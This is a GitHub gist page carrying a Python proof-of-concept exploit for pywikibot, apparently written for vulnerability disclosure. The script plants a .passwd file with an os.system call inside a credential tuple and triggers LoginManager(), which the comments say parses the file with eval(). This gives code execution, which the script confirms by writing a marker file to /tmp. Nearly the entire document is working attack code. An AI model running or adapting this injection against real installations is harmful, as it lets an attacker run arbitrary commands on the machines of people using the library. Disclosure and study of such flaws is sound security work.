Created
November 25, 2025 13:29
-
-
Save aydinnyunus/75e2a1ed4475e21a3b59c7f9bcdc7aff to your computer and use it in GitHub Desktop.
Revisions
-
aydinnyunus created this gist
Nov 25, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,45 @@ #!/usr/bin/env python3 import os import uuid from pathlib import Path # Change to PoC directory poc_dir = Path(__file__).parent os.chdir(poc_dir) # Generate random exploit file name exploit_filename = f'pwb_rce_{uuid.uuid4().hex[:8]}.txt' exploit_file = Path(f'/tmp/{exploit_filename}') # Create .passwd file with malicious code passwd_content = f"""# Normal password entry ('testuser', 'testpass') # Malicious code injection ('en', 'wikipedia', 'victim', __import__('os').system('touch /tmp/{exploit_filename} && echo "RCE SUCCESSFUL" > /tmp/{exploit_filename}')) """ (poc_dir / '.passwd').write_text(passwd_content, encoding='utf-8') os.chmod(poc_dir / '.passwd', 0o600) # Import pywikibot - triggers password file parsing import pywikibot from pywikibot.login import LoginManager # Create fake site to avoid network calls class FakeSite: def __init__(self): self.code = 'en' self.family = type('FakeFamily', (), {'name': 'wikipedia'})() pywikibot.Site = lambda *args, **kwargs: FakeSite() # This triggers readPassword() which uses eval() on line 255 LoginManager() # Check if RCE was successful if exploit_file.exists(): print("[!] RCE SUCCESSFUL!") print(f"[!] File created: {exploit_file}") print(f"[!] Contents: {exploit_file.read_text()}") else: print("[*] Exploit file not found")